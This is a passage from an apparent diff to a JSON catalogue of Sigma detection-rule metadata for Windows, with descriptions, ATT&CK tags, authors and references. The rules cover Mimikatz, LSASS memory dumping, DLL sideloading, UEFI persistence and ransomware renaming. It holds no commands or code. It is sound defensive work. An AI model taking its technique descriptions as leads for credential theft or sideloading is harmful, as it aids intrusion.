"0e20c89d-2264-44ae-8238-aeeaba609ece", + "value": "Office Template Creation", + "meta": { + "refs": [ + "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ], + "creation_date": "2022/06/02", + "filename": "file_event_win_word_template_creation.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
Which could be indicative of UEFI based persistence method", + "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "value": "UEFI Persistence Via Wpbbin - FileCreation", + "meta": { + "refs": [ + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://persistence-info.github.io/Data/wpbbin.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ], + "creation_date": "2022/07/18", + "filename": "file_event_win_wpbbin_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "value": "Writing Local Admin Share", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1546.002" + ], + "creation_date": "2022/01/01", + "filename": "file_event_win_writing_local_admin_share.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter 
protection", + "uuid": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "value": "Rename Common File to DLL File", + "meta": { + "refs": [ + "https://twitter.com/ffforward/status/1481672378639912960", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "file_rename_win_not_dll_to_dll.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Application installation" + ], + "logsource.category": "file_rename", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "value": "Suspicious Appended Extension", + "meta": { + "refs": [ + "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", + "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2022/07/16", + "filename": "file_rename_win_ransomware.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Backup software" + ], + "logsource.category": "file_rename", + "logsource.product": "windows" + } + }, + { + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. 
the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "value": "Abusing Azure Browser SSO", + "meta": { + "refs": [ + "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" + ], + "creation_date": "2020/07/15", + "filename": "image_load_abusing_azure_browser_sso.yml", + "author": "Den Iuzvyk", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", + "value": "Alternate PowerShell Hosts - Image", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": "image_load_alternate_powershell_hosts_moduleload.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "uuid": 
"418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "value": "Microsoft Defender Loading DLL from Nondefault Path", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/02", + "filename": "image_load_defender_load_dll_from_nondefault_path.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL image load activity as used by FoggyWeb backdoor loader", + "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "value": "FoggyWeb Backdoor DLL Loading", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ], + "creation_date": "2021/09/27", + "filename": "image_load_foggyweb_nobelium.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. 
Detects meterpreter's \"load powershell\" extension.", + "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "value": "In-memory PowerShell", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/p3nt4/PowerShdll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" + ], + "tags": [ + "attack.t1059.001", + "attack.execution" + ], + "creation_date": "2019/11/14", + "filename": "image_load_in_memory_powershell.yml", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects certain DLL loads when Mimikatz gets executed", + "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", + "value": "Mimikatz In-Memory", + "meta": { + "refs": [ + "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" + ], + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2019-04-004" + ], + "creation_date": "2017/03/13", + "filename": "image_load_mimikatz_inmemory_detection.yml", + "author": "sigma", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", + "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "value": "MSDT.exe Loading Diagnostic Library", + "meta": { + "refs": [ + "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" + ], + "creation_date": "2022/06/17", + "filename": "image_load_msdt_sdiageng.yml", + "author": "Greg (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes loading modules related to PCRE.NET package", + "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "value": "PCRE.NET Package Image Load", + "meta": { + "refs": [ + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/10/29", + "filename": "image_load_pcre_net_load.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "value": "Pingback Backdoor - Image", + "meta": { + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ], + "creation_date": "2021/05/05", + "filename": "image_load_pingback_backdoor.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": 
"image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", + "value": "Rundll32 Loading Renamed Comsvcs DLL", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1555200155351228419", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" + ], + "creation_date": "2022/08/14", + "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", + "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "value": "WMI Script Host Process Image Loaded", + "meta": { + "refs": [ + "https://twitter.com/HunterPlaybook/status/1301207718355759107", + "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2020/09/02", + "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is 
known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "value": "Antivirus Software DLL Sideloading", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/17", + "filename": "image_load_side_load_antivirus.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "value": "DLL Sideloading Of DBGCORE.DLL", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/10/25", + "filename": "image_load_side_load_dbgcore_dll.yml", + "author": "Nasreddine Bencherchali, Wietze 
Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "value": "DLL Sideloading Of DBGHELP.DLL", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/10/25", + "filename": "image_load_side_load_dbghelp_dll.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "value": "System DLL Sideloading From Non System Locations", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/14", + "filename": 
"image_load_side_load_from_non_system_location.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", + "level": "medium", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "value": "Microsoft Office DLL Sideload", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/17", + "filename": "image_load_side_load_office_dlls.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", + "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", + "value": "SCM DLL Sideload", + "meta": { + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/12/01", + "filename": 
"image_load_side_load_scm.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "value": "Third Party Software DLL Sideloading", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/17", + "filename": "image_load_side_load_third_party.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "value": "VMGuestLib DLL Sideload", + "meta": { + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/12/01", + "filename": "image_load_side_load_vmguestlib.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "FP could occure if the legitimate version of vmGuestLib already exists on the system" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are part of web 
browsers", + "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "value": "Web Browsers DLL Sideloading", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/17", + "filename": "image_load_side_load_web_browsers.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects SILENTTRINITY stager use", + "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "value": "SILENTTRINITY Stager Execution - DLL", + "meta": { + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ], + "creation_date": "2019/10/22", + "filename": "image_load_silenttrinity_stage_use.yml", + "author": "Aleksey Potapov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detect DLL Load from Spooler Service backup folder", + "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "value": "Windows Spooler Service Suspicious Binary Load", + "meta": { + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/ly4k/SpoolFool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" + ], + "creation_date": 
"2021/06/29", + "filename": "image_load_spoolsv_dll_load.yml", + "author": "FPT.EagleEye, Thomas Patzke (improvements)", + "level": "informational", + "falsepositive": [ + "Loading of legitimate driver" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", + "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", + "value": "Suspicious Load of Advapi31.dll", + "meta": { + "refs": [ + "https://github.com/hlldz/Phant0m", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2022/02/03", + "filename": "image_load_susp_advapi32_dll.yml", + "author": "frack113", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", + "value": "Cmstp Suspicious DLL Load", + "meta": { + "refs": [ + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ], + "creation_date": "2022/08/30", + "filename": "image_load_susp_cmstp.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use 
MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", + "value": "Load of dbghelp/dbgcore DLL from Suspicious Process", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", + "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", + "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/10/27", + "filename": "image_load_susp_dbghelp_dbgcore_load.yml", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "value": "DLL Load By System Process From Suspicious Locations", + "meta": { + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2022/07/17", + "filename": "image_load_susp_dll_load_system_process.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "The Fax service 
attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "value": "Fax Service DLL Search Order Hijack", + "meta": { + "refs": [ + "https://windows-internals.com/faxing-your-way-to-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2020/05/04", + "filename": "image_load_susp_fax_dll.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects any assembly DLL being loaded by an Office Product", + "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "value": "dotNET DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects CLR DLL being loaded by an Office Product", + "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "value": "CLR DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects any GAC DLL being loaded by an Office Product", + "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "value": "GAC DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DSParse DLL being loaded by an Office Product", + "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "value": "Active Directory Parsing DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_dsparse_dll_load.yml", + "author": 
